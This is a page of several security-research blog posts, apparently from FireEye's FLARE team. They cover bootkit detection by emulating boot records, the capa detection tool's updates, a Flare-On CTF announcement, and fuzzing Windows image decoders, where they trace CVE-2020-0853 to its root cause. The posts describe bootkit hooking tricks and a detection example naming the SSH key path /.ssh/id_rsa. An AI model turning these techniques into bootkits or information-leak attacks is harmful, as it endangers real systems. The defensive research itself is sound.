🔒
There are new articles available, click to refresh the page.
Before yesterdayThreat Research

BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)

Avg # Unique Boot Records (md5)

100-1000

428

1000-10000

4,738

10000+

8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing the assembly instruction as it executes to ultimately arrive at the “execution hash”


Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the engine X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

ELFant in the Room – capa v3

15 September 2021 at 13:00

Since our initial public release of capa, incident responders and reverse engineers have used the tool to automatically identify capabilities in Windows executables. With our newest code and ruleset updates, capa v3 also identifies capabilities in Executable and Linkable Format (ELF) files, such as those used on Linux and other Unix-like operating systems. This blog post describes the extended analysis and other improvements. You can download capa v3 standalone binaries from the project’s release page and checkout the source code on GitHub.

ELF File Format Support

capa finds capabilities in programs by parsing executable file formats, disassembling code, and then recognizing features in functions. In versions v1 and v2, capa only understood the PE file format, so its analysis was restricted to Windows programs. Thanks to our colleagues at Intezer, capa now recognizes ELF files! This means you can use the tool to identify behaviors in malware that targets Linux computers. Figure 1 shows a rule that describes techniques to fetch the current user on Linux.


Figure 1: capa rule identifying capabilities on Linux

We’re excited Intezer leverages capa and thrilled they are sharing their improvements with the community. In addition to the code updates, Intezer proposed 36 capa rules to identify various capabilities in ELF files, such as reconnaissance, persistence, and host interaction techniques. Please read Intezer’s blog post for more details.

New Features capa Can Recognize

As we taught capa to recognize ELF files, we also wanted rule authors to tune their rules to find behaviors specific to different operating systems (OS), CPU architectures, and file formats. For example, the APIs exposed by Windows are very different from those found on Linux systems; therefore, rules should clearly designate which pattern to use on Windows versus Linux.

Based on discussions and feedback collected from users and contributors, we've extended capa’s rule format to describe OSes, CPU architectures, and file formats. The rule shown in Figure 2 uses os features to distinguish techniques used to get networking interface information on Windows and Linux. Note that the rule is explicit about which APIs are found on each OS, making it easy for both humans and machines to interpret the matching logic.


Figure 2: capa rule using the os feature to distinguish OS specific features

We’ve also added arch (such as arch: i386 for 32-bit Intel code) and format (such as format: elf for ELF files) features to distinguish between CPU architectures and file formats. To learn more about these and capa’s rule syntax see the rule format documentation on GitHub.

Unfortunately, rules with these new features are not backwards compatible with older versions of capa. Therefore, you should prefer to upgrade your capa installation to take advantage of our enhanced rules.

Substring Features

To make many rules easier to read, we’ve added a convenience feature named substring that acts like a literal string match with implied leading and trailing wildcards. This makes it easier to match file path components, such as /.ssh/id_rsa. Previously, users had to wrap a substring with forward slashes and escape special characters with backslashes, leading to nearly incomprehensible character sequences. Now, a substring feature clearly describes a literal string found as part of a longer string. Figure 3 shows how much easier it is to read a substring feature.


Figure 3: Old- and new-style ways of describing a substring

Figure 4 shows a capa rule using a substring feature to describe a persistence location on Linux.


Figure 4: capa rule using the substring feature to identify persistence on Linux systems

Conclusion

The newest improvements add ELF file analysis support to capa and make its rules even more expressive. We thank the community and notably Intezer for their continued support. We love the collaboration and are excited for future opportunities. The v3 capa release also includes bug fixes, improvements to the IDAPython plugin capa explorer, and more than 50 new rules. See the capa changelog for all update details.

The new capa release is available on the release page and on PyPI. capa’s code and rules are available on GitHub. If you have any questions or feedback, please open an issue or discussion in the respective repository.

Announcing the Eighth Annual Flare-On Challenge

12 August 2021 at 15:30

The FLARE team is once again hosting its annual Flare-On challenge, now in its eighth year. Take this opportunity to enjoy some extreme social distancing by solving fun puzzles to test your mettle and learn new tricks on your path to reverse engineering excellence. The contest will begin at 8:00 p.m. ET on Sept. 10, 2021. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Oct. 22, 2021.

This year’s contest will consist of 10 challenges and feature a variety of formats, including Windows, Linux, and JavaScript. This is one of the only Windows-centric CTF contests out there and we have crafted it to represent the skills and challenges our FLARE team faces.

If you smash your way through all 10 challenges, you will receive a prize and permanent recognition on the Flare-On website to honor your greatness. Prize details will be revealed later, but as always, it will be worthwhile swag to earn the envy of your peers. Prior year’s prizes were belt buckles, a replica police badge, a challenge coin, a medal, a massive pin, and a cyber-styled skeleton key.

Check the Flare-On website for a live countdown timer, to view the previous year’s winners, and to download past challenges and solutions for practice. For official news and information, we will be using the Twitter hashtag: #flareon8.

capa 2.0: Better, Faster, Stronger

19 July 2021 at 18:00

We are excited to announce version 2.0 of our open-source tool called capa. capa automatically identifies capabilities in programs using an extensible rule set. The tool supports both malware triage and deep dive reverse engineering. If you haven’t heard of capa before, or need a refresher, check out our first blog post. You can download capa 2.0 standalone binaries from the project’s release page and checkout the source code on GitHub.

capa 2.0 enables anyone to contribute rules more easily, which makes the existing ecosystem even more vibrant. This blog post details the following major improvements included in capa 2.0:

  • New features and enhancements for the capa explorer IDA Pro plugin, allowing you to interactively explore capabilities and write new rules without switching windows
  • More concise and relevant results via identification of library functions using FLIRT and the release of accompanying open-source FLIRT signatures
  • Hundreds of new rules describing additional malware capabilities, bringing the collection up to 579 total rules, with more than half associated with ATT&CK techniques
  • Migration to Python 3, to make it easier to integrate capa with other projects

capa explorer and Rule Generator

capa explorer is an IDAPython plugin that shows capa results directly within IDA Pro. The version 2.0 release includes many additions and improvements to the plugin, but we'd like to highlight the most exciting addition: capa explorer now helps you write new capa rules directly in IDA Pro!

Since we spend most of our time in reverse engineering tools such as IDA Pro analyzing malware, we decided to add a capa rule generator. Figure 1 shows the rule generator interface.


Figure 1: capa explorer rule generator interface

Once you’ve installed capa explorer using the Getting Started guide, open the plugin by navigating to Edit > Plugins > FLARE capa explorer. You can start using the rule generator by selecting the Rule Generator tab at the top of the capa explorer pane. From here, navigate your IDA Pro Disassembly view to the function containing a technique you'd like to capture and click the Analyze button. The rule generator will parse, format, and display all the capa features that it finds in your function. You can write your rule using the rule generator's three main panes: Features, Preview, and Editor. Your first step is to add features from the Features pane.

The Features pane is a tree view containing all the capa features extracted from your function. You can filter for specific features using the search bar at the top of the pane. Then, you can add features by double-clicking them. Figure 2 shows this in action.


Figure 2: capa explorer feature selection

As you add features from the Features pane, the rule generator automatically formats and adds them to the Preview and Editor panes. The Preview and Editor panes help you finesse the features that you've added and allow you to modify other information like the rule's metadata.

The Editor pane is an interactive tree view that displays the statement and feature hierarchy that forms your rule. You can reorder nodes using drag-and-drop and edit nodes via right-click context menus. To help humans understand the rule logic, you can add descriptions and comments to features by typing in the Description and Comment columns. The rule generator automatically formats any changes that you make in the Editor pane and adds them to the Preview pane. Figure 3 shows how to manipulate a rule using the Editor pane.


Figure 3: capa explorer editor pane

The Preview pane is an editable textbox containing the final rule text. You can edit any of the text displayed. The rule generator automatically formats any changes that you make in the Preview pane and adds them to the Editor pane. Figure 4 shows how to edit a rule directly in the Preview pane.


Figure 4: capa explorer preview pane

As you make edits the rule generator lints your rule and notifies you of any errors using messages displayed underneath the Preview pane. Once you've finished writing your rule you can save it to your capa rules directory by clicking the Save button. The rule generator saves exactly what is displayed in the Preview pane. It’s that simple!

We’ve found that using the capa explorer rule generator significantly reduces the amount of time spent writing new capa rules. This tool not only automates most of the rule writing process but also eliminates the need to context switch between IDA Pro and your favorite text editor allowing you to codify your malware knowledge while it’s fresh in your mind.

To learn more about capa explorer and the rule generator check out the README.

Library Function Identification Using FLIRT

As we wrote hundreds of capa rules and inspected thousands of capa results, we recognized that the tool sometimes shows distracting results due to embedded library code. We believe that capa needs to focus its attention on the programmer’s logic and ignore supporting library code. For example, highly optimized C/C++ runtime routines and open-source library code enable a programmer to quickly build a product but are not the product itself. Therefore, capa results should reflect the programmer’s intent for the program rather than a categorization of every byte in the program.

Compare the capa v1.6 results in Figure 5 versus capa v2.0 results in Figure 6. capa v2.0 identifies and skips almost 200 library functions and produces more relevant results.


Figure 5: capa v1.6 results without library code recognition


Figure 6: capa v2.0 results ignoring library code functions

So, we searched for a way to differentiate a programmer’s code from library code.

After experimenting with a few strategies, we landed upon the Fast Library Identification and Recognition Technology (FLIRT) developed by Hex-Rays. Notably, this technique has remained stable and effective since 1996, is fast, requires very limited code analysis, and enjoys a wide community in the IDA Pro userbase. We figured out how IDA Pro matches FLIRT signatures and re-implemented a matching engine in Rust with Python bindings. Then, we built an open-source signature set that covers many of the library routines encountered in modern malware. Finally, we updated capa to use the new signatures to guide its analysis.

capa uses these signatures to differentiate library code from a programmer’s code. While capa can extract and match against the names of embedded library functions, it will skip finding capabilities and behaviors within the library code. This way, capa results better reflect the logic written by a programmer.

Furthermore, library function identification drastically improves capa runtime performance: since capa skips processing of library functions, it can avoid the costly rule matching steps across a substantial percentage of real-world functions. Across our testbed of 206 samples, 28% of the 186,000 total functions are recognized as library code by our function signatures. As our implementation can recognize around 100,000 functions/sec, library function identification overhead is negligible and capa is approximately 25% faster than in 2020!

Finally, we introduced a new feature class that rule authors can use to match recognized library functions: function-name. This feature matches at the file-level scope. We’ve already started using this new capability to recognize specific implementations of cryptography routines, such as AES provided by Crypto++, as shown in the example rule in Figure 7.


Figure 7: Example rule using function-name to recognize AES via Crypto++

As we developed rules for interesting behaviors, we learned a lot about where uncommon techniques are used legitimately. For example, as malware analysts, we most commonly see the cpuid instruction alongside anti-analysis checks, such as in VM detection routines. Therefore, we naively crafted rules to flag this instruction. But, when we tested it against our testbed, the rule matched most modern programs because this instruction is often legitimately used in high-optimized routines, such as memcpy, to opt-in to newer CPU features. In hindsight, this is obvious, but at the time it was a little surprising to see cpuid in around 15% of all executables. With the new FLIRT support, capa recognizes the optimized memcpy routine embedded by Visual Studio and won’t flag the embedded cpuid instruction, as it's not part of the programmer’s code.

When a user upgrades to capa 2.0, they’ll see that the tool runs faster and provides more precise results.

Signature Generation

To provide the benefits of python-flirt to all users (especially those without an IDA Pro license) we have spent significant time to create a comprehensive FLIRT signature set for the common malware analysis use-case. The signatures come included with capa and are also available at our GitHub under the Apache 2.0 license. We believe that other projects can benefit greatly from this. For example, we expect the performance of FLOSS to improve once we’ve incorporated library function identification. Moreover, you can use our signatures with IDA Pro to recognize more library code.

Our initial signatures include:

  • From Microsoft Visual Studio (VS), for all major versions from VS6 to VS2019:
    • C and C++ run-time libraries
    • Active Template Library (ATL) and Microsoft Foundation Class (MFC) libraries
  • The following open-source projects as compiled with VS2015, VS2017, and VS2019:
    • CryptoPP
    • curl
    • Microsoft Detours
    • Mbed TLS (previously PolarSSL)
    • OpenSSL
    • zlib

Identifying and collecting the relevant library and object files took a lot of work. For the older VS versions this was done manually. For newer VS versions and the respective open-source projects we were able to automate the process using vcpgk and Docker.

We then used the IDA Pro FLAIR utilities to convert gigabytes of executable code into pattern files and then into signatures. This process required extensive research and much trial and error. For instance, we spent two weeks testing and exploring the various FLAIR options to understand the best combination. We appreciate Hex-Rays for providing high-quality signatures for IDA Pro and thank them for sharing their research and tools with the community.

To learn more about the pattern and signature file generation check out the siglib repository. The FLAIR utilities are available in the protected download area on Hex-Rays’ website.

Rule Updates

Since the initial release, the community has more than doubled the total capa rule count from 260 to over 570 capability detection rules! This means that capa recognizes many more techniques seen in real-world malware, certainly saving analysts time as they reverse engineer programs. And to reiterate, we’ve surfed a wave of support as almost 30 colleagues from a dozen organizations have volunteered their experience to develop these rules. Thank you!

Figure 8 provides a high-level overview of capabilities capa currently captures, including:

  • Host Interaction describes program functionality to interact with the file system, processes, and the registry
  • Anti-Analysis describes packers, Anti-VM, Anti-Debugging, and other related techniques
  • Collection describes functionality used to steal data such as credentials or credit card information
  • Data Manipulation describes capabilities to encrypt, decrypt, and hash data
  • Communication describes data transfer techniques such as HTTP, DNS, and TCP


Figure 8: Overview of capa rule categories

More than half of capa’s rules are associated with a MITRE ATT&CK technique including all techniques introduced in ATT&CK version 9 that lie within capa’s scope. Moreover, almost half of the capa rules are currently associated with a Malware Behavior Catalog (MBC) identifier.

For more than 70% of capa rules we have collected associated real-world binaries. Each binary implements interesting capabilities and exhibits noteworthy features. You can view the entire sample collection at our capa test files GitHub page. We rely heavily on these samples for developing and testing code enhancements and rule updates.

Python 3 Support

Finally, we’ve spent nearly three months migrating capa from Python 2.7 to Python 3. This involved working closely with vivisect and we would like to thank the team for their support. After extensive testing and a couple of releases supporting two Python versions, we’re excited that capa 2.0 and future versions will be Python 3 only.

Conclusion

Now that you’ve seen all the recent improvements to capa, we hope you’ll upgrade to the newest capa version right away! Thanks to library function identification capa will report faster and more relevant results. Hundreds of new rules capture the most interesting malware functionality while the improved capa explorer plugin helps you to focus your analysis and codify your malware knowledge while it’s fresh.

Standalone binaries for Windows, Mac, and Linux are available on the capa Releases page. To install capa from PyPi use the command pip install flare-capa. The source code is available at our capa GitHub page. The project page on GitHub contains detailed documentation, including thorough installation instructions and a walkthrough of capa explorer. Please use GitHub to ask questions, discuss ideas, and submit issues.

We highly encourage you to contribute to capa’s rule corpus. The improved IDA Pro plugin makes it easier than ever before. If you have any issues or ideas related to rules, please let us know on the GitHub repository. Remember, when you share a rule with the community, you scale your impact across hundreds of reverse engineers in dozens of organizations.

Fuzzing Image Parsing in Windows, Part Two: Uninitialized Memory

3 March 2021 at 19:30

Continuing our discussion of image parsing vulnerabilities in Windows, we take a look at a comparatively less popular vulnerability class: uninitialized memory. In this post, we will look at Windows’ inbuilt image parsers—specifically for vulnerabilities involving the use of uninitialized memory.

The Vulnerability: Uninitialized Memory

In unmanaged languages, such as C or C++, variables are not initialized by default. Using uninitialized variables causes undefined behavior and may cause a crash. There are roughly two variants of uninitialized memory:

  • Direct uninitialized memory usage: An uninitialized pointer or an index is used in read or write. This may cause a crash.
  • Information leakage (info leak) through usage of uninitialized memory: Uninitialized memory content is accessible across a security boundary. An example: an uninitialized kernel buffer accessible from user mode, leading to information disclosure.

In this post we will be looking closely at the second variant in Windows image parsers, which will lead to information disclosure in situations such as web browsers where an attacker can read the decoded image back using JavaScript.

Detecting Uninitialized Memory Vulnerabilities

Compared to memory corruption vulnerabilities such as heap overflow and use-after-free, uninitialized memory vulnerabilities on their own do not access memory out of bound or out of scope. This makes detection of these vulnerabilities slightly more complicated than memory corruption vulnerabilities. While direct uninitialized memory usage can cause a crash and can be detected, information leakage doesn’t usually cause any crashes. Detecting it requires compiler instrumentations such as MemorySanitizer or binary instrumentation/recompilation tools such as Valgrind.

Detour: Detecting Uninitialized Memory in Linux

Let's take a little detour and look at detecting uninitialized memory in Linux and compare with Windows’ built-in capabilities. Even though compilers warn about some uninitialized variables, most of the complicated cases of uninitialized memory usage are not detected at compile time. For this, we can use a run-time detection mechanism. MemorySanitizer is a compiler instrumentation for both GCC and Clang, which detects uninitialized memory reads. A sample of how it works is given in Figure 1.

$ cat sample.cc
#include <stdio.h>

int main()
{
    int *arr = new int[10];
    if(arr[3] == 0)
    {
         printf("Yay!\n");
    }
    printf("%08x\n", arr[3]);
    return 0;
}

$ clang++ -fsanitize=memory -fno-omit-frame-pointer -g sample.cc

$ ./a.out
==29745==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x496db8  (/home/dan/uni/a.out+0x496db8)
    #1 0x7f463c5f1bf6  (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #2 0x41ad69  (/home/dan/uni/a.out+0x41ad69)

SUMMARY: MemorySanitizer: use-of-uninitialized-value (/home/dan/uni/a.out+0x496db8)
Exiting

Figure 1: MemorySanitizer detection of uninitialized memory

Similarly, Valgrind can also be used to detect uninitialized memory during run-time.

Detecting Uninitialized Memory in Windows

Compared to Linux, Windows lacks any built-in mechanism for detecting uninitialized memory usage. While Visual Studio and Clang-cl recently introduced AddressSanitizer support, MemorySanitizer and other sanitizers are not implemented as of this writing.

Some of the useful tools in Windows to detect memory corruption vulnerabilities such as PageHeap do not help in detecting uninitialized memory. On the contrary, PageHeap fills the memory allocations with patterns, which essentially makes them initialized.

There are few third-party tools, including Dr.Memory, that use binary instrumentation to detect memory safety issues such as heap overflows, uninitialized memory usages, use-after-frees, and others.

Detecting Uninitialized Memory in Image Decoding

Detecting uninitialized memory in Windows usually requires binary instrumentation, especially when we do not have access to source code. One of the indicators we can use to detect uninitialized memory usage, specifically in the case of image decoding, is the resulting pixels after the image is decoded.

When an image is decoded, it results in a set of raw pixels. If image decoding uses any uninitialized memory, some or all of the pixels may end up as random. In simpler words, decoding an image multiple times may result in different output each time if uninitialized memory is used. This difference of output can be used to detect uninitialized memory and aid writing a fuzzing harness targeting Windows image decoders. An example fuzzing harness is presented in Figure 2.

#define ROUNDS 20

unsigned char* DecodeImage(char *imagePath)
{
      unsigned char *pixels = NULL;     

      // use GDI or WIC to decode image and get the resulting pixels
      ...
      ...     

      return pixels;
}

void Fuzz(char *imagePath)
{
      unsigned char *refPixels = DecodeImage(imagePath);     

      if(refPixels != NULL)
      {
            for(int i = 0; i < ROUNDS; i++)
            {
                  unsigned char *currPixels = DecodeImage(imagePath);
                  if(!ComparePixels(refPixels, currPixels))
                  {
                        // the reference pixels and current pixels don't match
                        // crash now to let the fuzzer know of this file
                        CrashProgram();
                  }
                  free(currPixels);
            }
            free(refPixels);
      }
}

Figure 2: Diff harness

The idea behind this fuzzing harness is not entirely new; previously, lcamtuf used a similar idea to detect uninitialized memory in open-source image parsers and used a web page to display the pixel differences.

Fuzzing

With the diffing harness ready, one can proceed to look for the supported image formats and gather corpuses. Gathering image files for corpus is considerably easy given the near unlimited availability on the internet, but at the same time it is harder to find good corpuses among millions of files with unique code coverage. Code coverage information for Windows image parsing is tracked from WindowsCodecs.dll.

Note that unlike regular Windows fuzzing, we will not be enabling PageHeap this time as PageHeap “initializes” the heap allocations with patterns.

Results

During my research, I found three cases of uninitialized memory usage while fuzzing Windows built-in image parsers. Two of them are explained in detail in the next sections. Root cause analysis of uninitialized memory usage is non-trivial. We don’t have a crash location to back trace, and have to use the resulting pixel buffer to back trace to find the root cause—or use clever tricks to find the deviation.

CVE-2020-0853

Let’s look at the rendering of the proof of concept (PoC) file before going into the root cause of this vulnerability. For this we will use lcamtuf’s HTML, which loads the PoC image multiple times and compares the pixels with reference pixels.


Figure 3: CVE-2020-0853

As we can see from the resulting images (Figure 3), the output varies drastically in each decoding and we can assume this PoC leaks a lot of uninitialized memory.

To identify the root cause of these vulnerabilities, I used Time Travel Debugging (TTD) extensively. Tracing back the execution and keeping track of the memory address is a tedious task, but TTD makes it only slightly less painful by keeping the addresses and values constant and providing unlimited forward and backward executions. 

After spending quite a bit of time debugging the trace, I found the source of uninitialized memory in windowscodecs!CFormatConverter::Initialize. Even though the source was found, it was not initially clear why this memory ends up in the calculation of pixels without getting overwritten at all. To solve this mystery, additional debugging was done by comparing PoC execution trace against a normal TIFF file decoding. The following section shows the allocation, copying of uninitialized value to pixel calculation and the actual root cause of the vulnerability.

Allocation and Use of Uninitialized Memory

windowscodecs!CFormatConverter::Initialize allocates 0x40 bytes of memory, as shown in Figure 4.

0:000> r
rax=0000000000000000 rbx=0000000000000040 rcx=0000000000000040
rdx=0000000000000008 rsi=000002257a3db448 rdi=0000000000000000
rip=00007ffaf047a238 rsp=000000ad23f6f7c0 rbp=000000ad23f6f841
 r8=000000ad23f6f890  r9=0000000000000010 r10=000002257a3db468
r11=000000ad23f6f940 r12=000000000000000e r13=000002257a3db040
r14=000002257a3dbf60 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
windowscodecs!CFormatConverter::Initialize+0x1c8:
00007ffa`f047a238 ff15ea081200    call    qword ptr [windowscodecs!_imp_malloc (00007ffa`f059ab28)] ds:00007ffa`f059ab28={msvcrt!malloc (00007ffa`f70e9d30)}
0:000> k
 # Child-SP          RetAddr               Call Site
00 000000ad`23f6f7c0 00007ffa`f047c5fb     windowscodecs!CFormatConverter::Initialize+0x1c8
01 000000ad`23f6f890 00007ffa`f047c2f3     windowscodecs!CFormatConverter::Initialize+0x12b
02 000000ad`23f6f980 00007ff6`34ca6dff     windowscodecs!CFormatConverterResolver::Initialize+0x273

//Uninitialized memory after allocation:
0:000> db @rax
00000225`7a3dbf70  d0 b0 3d 7a 25 02 00 00-60 24 3d 7a 25 02 00 00  ..=z%...`$=z%...
00000225`7a3dbf80  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbf90  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfa0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfb0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
00000225`7a3dbfc0  00 00 00 00 00 00 00 00-64 51 7c 26 c3 2c 01 03  ........dQ|&.,..
00000225`7a3dbfd0  f0 00 2f 6b 25 02 00 00-f0 00 2f 6b 25 02 00 00  ../k%...../k%...
00000225`7a3dbfe0  60 00 3d 7a 25 02 00 00-60 00 3d 7a 25 02 00 00  `.=z%...`.=z%...

Figure 4: Allocation of memory

The memory never gets written and the uninitialized values are inverted in windowscodecs!CLibTiffDecoderBase::HrProcessCopy and further processed in windowscodecs!GammaConvert_16bppGrayInt_128bppRGBA and in later called scaling functions.

As there is no read or write into uninitialized memory before HrProcessCopy, I traced the execution back from HrProcessCopy and compared the execution traces with a normal tiff decoding trace. A difference was found in the way windowscodecs!CLibTiffDecoderBase::UnpackLine behaved with the PoC file compared to a normal TIFF file, and one of the function parameters in UnpackLine was a pointer to the uninitialized buffer.

The UnpackLine function has a series of switch-case statements working with bits per sample (BPS) of TIFF images. In our PoC TIFF file, the BPS value is 0x09—which is not supported by UnpackLine—and the control flow never reaches a code path that writes to the buffer. This is the root cause of the uninitialized memory, which gets processed further down the pipeline and finally shown as pixel data.

Patch

After presenting my analysis to Microsoft, they decided to patch the vulnerability by making the files with unsupported BPS values as invalid. This avoids all decoding and rejects the file in the very early phase of its loading.

CVE-2020-1397


Figure 5: Rendering of CVE-2020-1397

